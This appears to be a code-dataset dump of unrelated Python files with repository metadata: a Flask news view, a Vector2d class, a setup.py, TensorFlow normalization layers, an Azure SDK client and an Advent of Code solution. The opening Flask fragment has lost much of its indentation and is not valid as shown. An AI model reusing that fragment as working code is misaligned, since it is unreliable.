        return jsonify(errno=response_code.RET.DBERR, errmsg='News does not exist')
if action=='collect':
if news not in user.collection_news:
user.collection_news.append(news)
else:
if news in user.collection_news:
user.collection_news.remove(news)
try:
db.session.commit()
except Exception as e:
logging.error(e)
db.session.rollback()
        return jsonify(errno=response_code.RET.DBERR, errmsg='Failed to save data')
    return jsonify(errno=response_code.RET.OK, errmsg='Collection updated successfully')
@blue_news.route('/detail/<int:news_id>')
def news_detail(news_id):
user_id=session.get('user_id',None)
user=None
if user_id:
try:
user=User.query.get(user_id)
except Exception as e:
logging.error(e)
            return jsonify(errno=response_code.RET.DBERR, errmsg='Failed to query user')
news_clicks=None
try:
news_clicks=News.query.order_by(News.clicks.desc()).limit(constants.CLICK_RANK_MAX_NEWS)
except Exception as e:
logging.error(e)
        return jsonify(errno=response_code.RET.DBERR, errmsg='Failed to query news ranking')
news_detail=None
try:
news_detail=News.query.get(news_id)
except Exception as e:
logging.error(e)
abort(404)
if not news_detail:
abort(404)
news_detail.clicks+=1
try:
db.session.commit()
except Exception as e:
logging.error(e)
db.session.rollback()
    is_collected = False
    if user:
        if news_detail in user.collection_news:
            is_collected = True
comments=None
try:
comments=Comment.query.filter(Comment.news_id==news_id).order_by(Comment.create_time.desc()).all()
except Exception as e:
logging.error(e)
        return jsonify(errno=response_code.RET.DBERR, errmsg='Failed to query news comments')
    comment_like_id = []
    if user:
        comment_likes = CommentLike.query.filter(CommentLike.user_id == user.id).all()
        comment_like_id = [comment_like.comment_id for comment_like in comment_likes]
comment_dict_list=[]
for comment in comments:
comment_dict=comment.to_dict()
comment_dict['is_like']=False
if comment.id in comment_like_id:
comment_dict['is_like'] = True
comment_dict_list.append(comment_dict)
is_followed=False
if user and news_detail.user:
if news_detail.user in user.followed:
is_followed = True
context = {
'user': user.to_dict() if user else None,
'news_clicks': news_clicks,
'news_detail':news_detail.to_dict(),
        'is_collected': is_collected,
'comments':comment_dict_list,
'is_followed':is_followed,
}
return render_template('news/detail.html',context=context)
| true
| true
|
1c44627afca4e7d3f07b38ceb7c7b9103a678669
| 1,590
|
py
|
Python
|
FluentPython/pythonic_object/vector2d.py
|
xu6148152/Binea_Python_Project
|
d943eb5f4685d08f080b372dcf1a7cbd5d63efed
|
[
"MIT"
] | null | null | null |
FluentPython/pythonic_object/vector2d.py
|
xu6148152/Binea_Python_Project
|
d943eb5f4685d08f080b372dcf1a7cbd5d63efed
|
[
"MIT"
] | null | null | null |
FluentPython/pythonic_object/vector2d.py
|
xu6148152/Binea_Python_Project
|
d943eb5f4685d08f080b372dcf1a7cbd5d63efed
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- encoding: utf-8 -*-
from array import array
import math
class Vector2d:
__slots__ = ('__x', '__y')
typecode = 'd'
def __init__(self, x, y):
self.__x = x
self.__y = y
def __repr__(self):
class_name = type(self).__name__
return '{}({!r}, {!r})'.format(class_name, *self)
def __str__(self):
return str(tuple(self))
def __bytes__(self):
return bytes([ord(self.typecode)]) + bytes(array(self.typecode, self))
def __eq__(self, other):
return tuple(self) == tuple(other)
def __abs__(self):
return math.hypot(self.__x, self.__y)
def __bool__(self):
return bool(abs(self))
def angle(self):
return math.atan2(self.__y, self.__x)
def __format__(self, format_spec=''):
if format_spec.endswith('p'):
format_spec = format_spec[:-1]
coords = (abs(self), self.angle())
outer_fmt = '<{}, {}>'
else:
coords = self
outer_fmt = '({}, {})'
components = (format(c, format_spec) for c in coords)
return outer_fmt.format(*components)
@property
def x(self):
return self.__x
@property
def y(self):
return self.__y
def __iter__(self):
return (i for i in (self.__x, self.__y))
def __hash__(self):
return hash(self.__x) ^ hash(self.__y)
@classmethod
def frombytes(cls, octets):
typecode = chr(octets[0])
memv = memoryview(octets[1:]).cast(typecode)
return cls(*memv)
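# Quick usage check (a sketch, not part of the original example):
#   >>> v = Vector2d(3, 4)
#   >>> abs(v)
#   5.0
#   >>> format(v, '.3ep')    # trailing 'p' switches to polar <r, theta>
#   '<5.000e+00, 9.273e-01>'
#   >>> Vector2d.frombytes(bytes(v)) == v
#   True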
| 22.714286
| 78
| 0.561635
|
from array import array
import math
class Vector2d:
__slots__ = ('__x', '__y')
typecode = 'd'
def __init__(self, x, y):
self.__x = x
self.__y = y
def __repr__(self):
class_name = type(self).__name__
return '{}({!r}, {!r})'.format(class_name, *self)
def __str__(self):
return str(tuple(self))
def __bytes__(self):
return bytes([ord(self.typecode)]) + bytes(array(self.typecode, self))
def __eq__(self, other):
return tuple(self) == tuple(other)
def __abs__(self):
return math.hypot(self.__x, self.__y)
def __bool__(self):
return bool(abs(self))
def angle(self):
return math.atan2(self.__y, self.__x)
def __format__(self, format_spec=''):
if format_spec.endswith('p'):
format_spec = format_spec[:-1]
coords = (abs(self), self.angle())
outer_fmt = '<{}, {}>'
else:
coords = self
outer_fmt = '({}, {})'
components = (format(c, format_spec) for c in coords)
return outer_fmt.format(*components)
@property
def x(self):
return self.__x
@property
def y(self):
return self.__y
def __iter__(self):
return (i for i in (self.__x, self.__y))
def __hash__(self):
return hash(self.__x) ^ hash(self.__y)
@classmethod
def frombytes(cls, octets):
typecode = chr(octets[0])
memv = memoryview(octets[1:]).cast(typecode)
return cls(*memv)
| true
| true
|
1c4462df77242b80107f725e68f97cb39f16c436
| 1,408
|
py
|
Python
|
setup.py
|
penguinstampede/shippo-python-client
|
d21366d959d22ff301947072346479c287bf0f51
|
[
"MIT"
] | 101
|
2015-10-10T18:44:36.000Z
|
2022-01-26T03:54:27.000Z
|
setup.py
|
penguinstampede/shippo-python-client
|
d21366d959d22ff301947072346479c287bf0f51
|
[
"MIT"
] | 47
|
2015-08-07T21:13:50.000Z
|
2022-03-08T18:48:16.000Z
|
setup.py
|
penguinstampede/shippo-python-client
|
d21366d959d22ff301947072346479c287bf0f51
|
[
"MIT"
] | 71
|
2015-10-31T01:54:09.000Z
|
2022-02-17T22:43:30.000Z
|
import os
from setuptools import setup
version_contents = {}
here = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(here, "shippo", "version.py"), encoding="utf-8") as f:
exec(f.read(), version_contents)
setup(
name='shippo',
version=version_contents['VERSION'],
description='Shipping API Python library (USPS, FedEx, UPS and more)',
author='Shippo',
author_email='support@goshippo.com',
url='https://goshippo.com/',
packages=['shippo', 'shippo.test', 'shippo.test.integration'],
package_data={'shippo': ['../VERSION']},
install_requires=[
'requests >= 2.21.0, <= 2.26.0',
'simplejson >= 3.16.0, <= 3.17.2',
],
test_suite='shippo.test.all',
tests_require=['unittest2', 'mock', 'vcrpy'],
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3 :: Only",
"Programming Language :: Python :: Implementation :: PyPy",
"Topic :: Software Development :: Libraries :: Python Modules",
]
)
| 33.52381
| 77
| 0.620028
|
import os
from setuptools import setup
version_contents = {}
here = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(here, "shippo", "version.py"), encoding="utf-8") as f:
exec(f.read(), version_contents)
setup(
name='shippo',
version=version_contents['VERSION'],
description='Shipping API Python library (USPS, FedEx, UPS and more)',
author='Shippo',
author_email='support@goshippo.com',
url='https://goshippo.com/',
packages=['shippo', 'shippo.test', 'shippo.test.integration'],
package_data={'shippo': ['../VERSION']},
install_requires=[
'requests >= 2.21.0, <= 2.26.0',
'simplejson >= 3.16.0, <= 3.17.2',
],
test_suite='shippo.test.all',
tests_require=['unittest2', 'mock', 'vcrpy'],
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3 :: Only",
"Programming Language :: Python :: Implementation :: PyPy",
"Topic :: Software Development :: Libraries :: Python Modules",
]
)
| true
| true
|
1c4462e887341137a81c3efd2fa98f4ce8952bfa
| 2,882
|
py
|
Python
|
tensorpack/models/layer_norm.py
|
myelintek/tensorpack
|
fcbf5869d78cf7f3b59c46318b6c883a7ea12056
|
[
"Apache-2.0"
] | 3
|
2017-12-02T16:49:42.000Z
|
2018-11-04T16:53:44.000Z
|
tensorpack/models/layer_norm.py
|
dongzhuoyao/tensorpack
|
78bcf6053172075a761eac90ab22f0b631b272a0
|
[
"Apache-2.0"
] | 6
|
2020-01-28T23:03:24.000Z
|
2022-02-10T01:21:18.000Z
|
tensorpack/models/layer_norm.py
|
wdings/Mask-RCNN
|
8d5ae5cc2cfcf2e4e53b4d1064ac9e727f736d09
|
[
"Apache-2.0"
] | 5
|
2017-11-15T14:46:27.000Z
|
2018-11-04T16:54:06.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# File: layer_norm.py
# Author: Yuxin Wu <ppwwyyxxc@gmail.com>
import tensorflow as tf
from .common import layer_register
__all__ = ['LayerNorm', 'InstanceNorm']
@layer_register()
def LayerNorm(x, epsilon=1e-5, use_bias=True, use_scale=True, data_format='NHWC'):
"""
Layer Normalization layer, as described in the paper:
`Layer Normalization <https://arxiv.org/abs/1607.06450>`_.
Args:
x (tf.Tensor): a 4D or 2D tensor. When 4D, the layout should match data_format.
epsilon (float): epsilon to avoid divide-by-zero.
use_scale, use_bias (bool): whether to use the extra affine transformation or not.
"""
shape = x.get_shape().as_list()
ndims = len(shape)
assert ndims in [2, 4]
mean, var = tf.nn.moments(x, list(range(1, len(shape))), keep_dims=True)
if data_format == 'NCHW':
chan = shape[1]
new_shape = [1, chan, 1, 1]
else:
chan = shape[-1]
new_shape = [1, 1, 1, chan]
if ndims == 2:
new_shape = [1, chan]
if use_bias:
beta = tf.get_variable('beta', [chan], initializer=tf.constant_initializer())
beta = tf.reshape(beta, new_shape)
else:
beta = tf.zeros([1] * ndims, name='beta')
if use_scale:
gamma = tf.get_variable('gamma', [chan], initializer=tf.constant_initializer(1.0))
gamma = tf.reshape(gamma, new_shape)
else:
gamma = tf.ones([1] * ndims, name='gamma')
return tf.nn.batch_normalization(x, mean, var, beta, gamma, epsilon, name='output')
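# Minimal usage sketch (assuming tensorpack's registered-layer convention,
# where the first positional argument names the variable scope):
#   x = tf.placeholder(tf.float32, [None, 32, 32, 64])
#   y = LayerNorm('ln', x)   # normalizes each sample over all non-batch axes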
@layer_register()
def InstanceNorm(x, epsilon=1e-5, data_format='NHWC', use_affine=True):
"""
Instance Normalization, as in the paper:
`Instance Normalization: The Missing Ingredient for Fast Stylization
<https://arxiv.org/abs/1607.08022>`_.
Args:
x (tf.Tensor): a 4D tensor.
epsilon (float): avoid divide-by-zero
use_affine (bool): whether to apply learnable affine transformation
"""
shape = x.get_shape().as_list()
assert len(shape) == 4, "Input of InstanceNorm has to be 4D!"
if data_format == 'NHWC':
axis = [1, 2]
ch = shape[3]
new_shape = [1, 1, 1, ch]
else:
axis = [2, 3]
ch = shape[1]
new_shape = [1, ch, 1, 1]
assert ch is not None, "Input of InstanceNorm require known channel!"
mean, var = tf.nn.moments(x, axis, keep_dims=True)
if not use_affine:
return tf.divide(x - mean, tf.sqrt(var + epsilon), name='output')
beta = tf.get_variable('beta', [ch], initializer=tf.constant_initializer())
beta = tf.reshape(beta, new_shape)
gamma = tf.get_variable('gamma', [ch], initializer=tf.constant_initializer(1.0))
gamma = tf.reshape(gamma, new_shape)
return tf.nn.batch_normalization(x, mean, var, beta, gamma, epsilon, name='output')
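# Usage sketch for InstanceNorm (same scope-name assumption as above);
# unlike LayerNorm it normalizes per channel, over the spatial axes only:
#   z = InstanceNorm('inorm', x, use_affine=True)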
| 33.126437
| 90
| 0.630812
|
import tensorflow as tf
from .common import layer_register
__all__ = ['LayerNorm', 'InstanceNorm']
@layer_register()
def LayerNorm(x, epsilon=1e-5, use_bias=True, use_scale=True, data_format='NHWC'):
shape = x.get_shape().as_list()
ndims = len(shape)
assert ndims in [2, 4]
mean, var = tf.nn.moments(x, list(range(1, len(shape))), keep_dims=True)
if data_format == 'NCHW':
chan = shape[1]
new_shape = [1, chan, 1, 1]
else:
chan = shape[-1]
new_shape = [1, 1, 1, chan]
if ndims == 2:
new_shape = [1, chan]
if use_bias:
beta = tf.get_variable('beta', [chan], initializer=tf.constant_initializer())
beta = tf.reshape(beta, new_shape)
else:
beta = tf.zeros([1] * ndims, name='beta')
if use_scale:
gamma = tf.get_variable('gamma', [chan], initializer=tf.constant_initializer(1.0))
gamma = tf.reshape(gamma, new_shape)
else:
gamma = tf.ones([1] * ndims, name='gamma')
return tf.nn.batch_normalization(x, mean, var, beta, gamma, epsilon, name='output')
@layer_register()
def InstanceNorm(x, epsilon=1e-5, data_format='NHWC', use_affine=True):
shape = x.get_shape().as_list()
assert len(shape) == 4, "Input of InstanceNorm has to be 4D!"
if data_format == 'NHWC':
axis = [1, 2]
ch = shape[3]
new_shape = [1, 1, 1, ch]
else:
axis = [2, 3]
ch = shape[1]
new_shape = [1, ch, 1, 1]
assert ch is not None, "Input of InstanceNorm require known channel!"
mean, var = tf.nn.moments(x, axis, keep_dims=True)
if not use_affine:
return tf.divide(x - mean, tf.sqrt(var + epsilon), name='output')
beta = tf.get_variable('beta', [ch], initializer=tf.constant_initializer())
beta = tf.reshape(beta, new_shape)
gamma = tf.get_variable('gamma', [ch], initializer=tf.constant_initializer(1.0))
gamma = tf.reshape(gamma, new_shape)
return tf.nn.batch_normalization(x, mean, var, beta, gamma, epsilon, name='output')
| true
| true
|
1c4462e988a95308633ced6d419f8d86daa04317
| 6,331
|
py
|
Python
|
src/cosmosdb-preview/azext_cosmosdb_preview/vendored_sdks/azure_mgmt_cosmosdb/operations/_percentile_operations.py
|
santosh02iiit/azure-cli-extensions
|
24247cfa19e2a5894937f19e17fbdc8308b28ef6
|
[
"MIT"
] | 1
|
2021-08-03T18:32:54.000Z
|
2021-08-03T18:32:54.000Z
|
src/cosmosdb-preview/azext_cosmosdb_preview/vendored_sdks/azure_mgmt_cosmosdb/operations/_percentile_operations.py
|
santosh02iiit/azure-cli-extensions
|
24247cfa19e2a5894937f19e17fbdc8308b28ef6
|
[
"MIT"
] | 4
|
2020-09-07T12:56:24.000Z
|
2021-02-04T12:19:20.000Z
|
src/cosmosdb-preview/azext_cosmosdb_preview/vendored_sdks/azure_mgmt_cosmosdb/operations/_percentile_operations.py
|
santosh02iiit/azure-cli-extensions
|
24247cfa19e2a5894937f19e17fbdc8308b28ef6
|
[
"MIT"
] | 2
|
2021-09-22T08:25:32.000Z
|
2021-09-24T06:55:31.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class PercentileOperations(object):
"""PercentileOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.cosmosdb.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list_metrics(
self,
resource_group_name, # type: str
account_name, # type: str
filter, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.PercentileMetricListResult"]
"""Retrieves the metrics determined by the given filter for the given database account. This url
is only for PBS and Replication Latency data.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param filter: An OData filter expression that describes a subset of metrics to return. The
parameters that can be filtered are name.value (name of the metric, can have an or of multiple
names), startTime, endTime, and timeGrain. The supported operator is eq.
:type filter: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either PercentileMetricListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.cosmosdb.models.PercentileMetricListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.PercentileMetricListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-04-01-preview"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_metrics.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
query_parameters['$filter'] = self._serialize.query("filter", filter, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('PercentileMetricListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_metrics.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/percentile/metrics'} # type: ignore
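# Illustrative call (a sketch; the client wiring below is an assumption, only
# the $filter syntax comes from the docstring above):
#   pager = client.percentile.list_metrics(
#       resource_group_name='my-rg',
#       account_name='mycosmosaccount',
#       filter="name.value eq 'Max RUs Per Second'")
#   for result in pager:
#       print(result)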
| 49.077519
| 202
| 0.660559
|
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models as _models
if TYPE_CHECKING:
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class PercentileOperations(object):
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list_metrics(
self,
resource_group_name,
account_name,
filter,
**kwargs
):
cls = kwargs.pop('cls', None)
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2021-04-01-preview"
accept = "application/json"
def prepare_request(next_link=None):
header_parameters = {}
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
url = self.list_metrics.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
}
url = self._client.format_url(url, **path_format_arguments)
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
query_parameters['$filter'] = self._serialize.query("filter", filter, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {}
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('PercentileMetricListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_metrics.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/percentile/metrics'}
| true
| true
|
1c44634315c59aaee3c879a33d1c2528c3e083a0
| 2,915
|
py
|
Python
|
twentysecond.py
|
MSQFuersti/aoc2020
|
f5e163c426a6c481d645ace2cc8af7c493306291
|
[
"MIT"
] | null | null | null |
twentysecond.py
|
MSQFuersti/aoc2020
|
f5e163c426a6c481d645ace2cc8af7c493306291
|
[
"MIT"
] | null | null | null |
twentysecond.py
|
MSQFuersti/aoc2020
|
f5e163c426a6c481d645ace2cc8af7c493306291
|
[
"MIT"
] | null | null | null |
import csv
import copy
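# Advent of Code 2020, day 22 ("Crab Combat"): playGame implements part 1;
# playGameRecursive implements part 2, where a previously seen pair of deck
# configurations ends the game in player one's favour.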
def getCsv(txtFileName='twentysecond.txt'):
with open(txtFileName) as csv_file:
csv_reader = csv.reader(csv_file, delimiter=' ')
return list(csv_reader)
def parseCardDecks(csvFile):
playerOne = []
playerTwo = []
isFirst = True
for row in csvFile:
if len(row) > 1:
continue
if not row:
isFirst = False
continue
if isFirst:
playerOne.append(int(row[0]))
else:
playerTwo.append(int(row[0]))
return [playerOne, playerTwo]
def playGame(playerOne, playerTwo):
playerOne = copy.deepcopy(playerOne)
playerTwo = copy.deepcopy(playerTwo)
while True:
if not playerOne or not playerTwo:
break
cardOne = playerOne.pop(0)
cardTwo = playerTwo.pop(0)
if cardOne > cardTwo:
playerOne.extend([cardOne, cardTwo])
else:
playerTwo.extend([cardTwo, cardOne])
factors = list(range(50, 0, -1))
if playerOne:
points = [a * b for a, b in zip(playerOne, factors)]
else:
points = [a * b for a, b in zip(playerTwo, factors)]
return sum(points)
def playGameRecursive(playerOne, playerTwo):
playerOne = copy.deepcopy(playerOne)
playerTwo = copy.deepcopy(playerTwo)
    seenConfigs = set()
    while True:
        if not playerOne or not playerTwo:
            return [playerOne, playerTwo]
        # Per the puzzle rules the *pair* of decks must repeat together, so
        # track (deckOne, deckTwo) snapshots as a single configuration.
        config = (tuple(playerOne), tuple(playerTwo))
        if config in seenConfigs:
            return [playerOne, []]
        seenConfigs.add(config)
cardOne = playerOne.pop(0)
cardTwo = playerTwo.pop(0)
if cardOne <= len(playerOne) and cardTwo <= len(playerTwo):
subPlayerOne, subPlayerTwo = playGameRecursive(playerOne[:cardOne], playerTwo[:cardTwo])
if subPlayerOne:
playerOne.extend([cardOne, cardTwo])
else:
playerTwo.extend([cardTwo, cardOne])
else:
if cardOne > cardTwo:
playerOne.extend([cardOne, cardTwo])
else:
playerTwo.extend([cardTwo, cardOne])
def getPoints(finishedPlayerOne, finishedPlayerTwo):
maxPoints = max(len(finishedPlayerOne), len(finishedPlayerTwo))
factor = list(range(maxPoints, 0, -1))
if finishedPlayerOne:
pointsList = [a * b for a, b in zip(finishedPlayerOne, factor)]
else:
pointsList = [a * b for a, b in zip(finishedPlayerTwo, factor)]
return sum(pointsList)
csvFiles = getCsv()
arrayPlayerOne, arrayPlayerTwo = parseCardDecks(csvFiles)
finishedPlayerOne, finishedPlayerTwo = playGameRecursive(arrayPlayerOne, arrayPlayerTwo)
points = getPoints(finishedPlayerOne, finishedPlayerTwo)
print(points)
| 28.861386
| 100
| 0.633276
|
import csv
import copy
def getCsv(txtFileName='twentysecond.txt'):
with open(txtFileName) as csv_file:
csv_reader = csv.reader(csv_file, delimiter=' ')
return list(csv_reader)
def parseCardDecks(csvFile):
playerOne = []
playerTwo = []
isFirst = True
for row in csvFile:
if len(row) > 1:
continue
if not row:
isFirst = False
continue
if isFirst:
playerOne.append(int(row[0]))
else:
playerTwo.append(int(row[0]))
return [playerOne, playerTwo]
def playGame(playerOne, playerTwo):
playerOne = copy.deepcopy(playerOne)
playerTwo = copy.deepcopy(playerTwo)
while True:
if not playerOne or not playerTwo:
break
cardOne = playerOne.pop(0)
cardTwo = playerTwo.pop(0)
if cardOne > cardTwo:
playerOne.extend([cardOne, cardTwo])
else:
playerTwo.extend([cardTwo, cardOne])
factors = list(range(50, 0, -1))
if playerOne:
points = [a * b for a, b in zip(playerOne, factors)]
else:
points = [a * b for a, b in zip(playerTwo, factors)]
return sum(points)
def playGameRecursive(playerOne, playerTwo):
playerOne = copy.deepcopy(playerOne)
playerTwo = copy.deepcopy(playerTwo)
    seenConfigs = set()
    while True:
        if not playerOne or not playerTwo:
            return [playerOne, playerTwo]
        config = (tuple(playerOne), tuple(playerTwo))
        if config in seenConfigs:
            return [playerOne, []]
        seenConfigs.add(config)
cardOne = playerOne.pop(0)
cardTwo = playerTwo.pop(0)
if cardOne <= len(playerOne) and cardTwo <= len(playerTwo):
subPlayerOne, subPlayerTwo = playGameRecursive(playerOne[:cardOne], playerTwo[:cardTwo])
if subPlayerOne:
playerOne.extend([cardOne, cardTwo])
else:
playerTwo.extend([cardTwo, cardOne])
else:
if cardOne > cardTwo:
playerOne.extend([cardOne, cardTwo])
else:
playerTwo.extend([cardTwo, cardOne])
def getPoints(finishedPlayerOne, finishedPlayerTwo):
maxPoints = max(len(finishedPlayerOne), len(finishedPlayerTwo))
factor = list(range(maxPoints, 0, -1))
if finishedPlayerOne:
pointsList = [a * b for a, b in zip(finishedPlayerOne, factor)]
else:
pointsList = [a * b for a, b in zip(finishedPlayerTwo, factor)]
return sum(pointsList)
csvFiles = getCsv()
arrayPlayerOne, arrayPlayerTwo = parseCardDecks(csvFiles)
finishedPlayerOne, finishedPlayerTwo = playGameRecursive(arrayPlayerOne, arrayPlayerTwo)
points = getPoints(finishedPlayerOne, finishedPlayerTwo)
print(points)
| true
| true
|
1c44638e5289159fd6642dbde2d28bf744b91d3c
| 72
|
py
|
Python
|
apriori_python/__init__.py
|
ablarry/apriori_python
|
c460d6bf87848a2823923dca720df6183bd334cc
|
[
"MIT"
] | 41
|
2020-10-25T15:03:58.000Z
|
2022-03-18T02:43:27.000Z
|
apriori_python/__init__.py
|
ablarry/apriori_python
|
c460d6bf87848a2823923dca720df6183bd334cc
|
[
"MIT"
] | 1
|
2021-05-18T07:53:05.000Z
|
2021-05-21T19:09:42.000Z
|
apriori_python/__init__.py
|
ablarry/apriori_python
|
c460d6bf87848a2823923dca720df6183bd334cc
|
[
"MIT"
] | 22
|
2020-12-13T13:34:21.000Z
|
2022-02-05T19:36:57.000Z
|
from apriori_python.apriori import *
from apriori_python.utils import *
| 36
| 37
| 0.833333
|
from apriori_python.apriori import *
from apriori_python.utils import *
| true
| true
|
1c44646f843cea9fb6ce2b8eab0852efc6aca10c
| 299
|
py
|
Python
|
ex003.py
|
rezende-marcus/PythonExercicios
|
82deed6e10c1bb47ac63a3a8889d56582ab7a718
|
[
"MIT"
] | null | null | null |
ex003.py
|
rezende-marcus/PythonExercicios
|
82deed6e10c1bb47ac63a3a8889d56582ab7a718
|
[
"MIT"
] | null | null | null |
ex003.py
|
rezende-marcus/PythonExercicios
|
82deed6e10c1bb47ac63a3a8889d56582ab7a718
|
[
"MIT"
] | null | null | null |
# n1 = input('Enter a value: ')
# n2 = input('Enter another value: ')
# s = n1 + n2
# print('The sum of {} and {} is {}!'.format(n1, n2, s))
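# Without int(), '+' concatenates the raw input strings: for inputs 3 and 4
# the commented version above would report '34' as the sum instead of 7.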
n1 = int(input('Enter a value: '))
n2 = int(input('Enter another value: '))
s = n1 + n2
print('The sum of {} and {} is {}!'.format(n1, n2, s))
| 37.375
| 63
| 0.568562
|
n1 = int(input('Enter a value: '))
n2 = int(input('Enter another value: '))
s = n1 + n2
print('The sum of {} and {} is {}!'.format(n1, n2, s))
| true
| true
|
1c446470ca7bdbc10b3f8ec6dcaba559b291e735
| 4,849
|
py
|
Python
|
twext/internet/fswatch.py
|
troglodyne/ccs-twistedextensions
|
1b43cb081ba68ae310140a9e853e041cd6362625
|
[
"Apache-2.0"
] | 23
|
2016-08-14T07:20:27.000Z
|
2021-11-08T09:47:45.000Z
|
twext/internet/fswatch.py
|
DalavanCloud/ccs-twistedextensions
|
2c4046df88873dcf33fba7840ed90e4238dcbec7
|
[
"Apache-2.0"
] | 2
|
2016-12-15T17:51:49.000Z
|
2019-05-12T15:59:03.000Z
|
twext/internet/fswatch.py
|
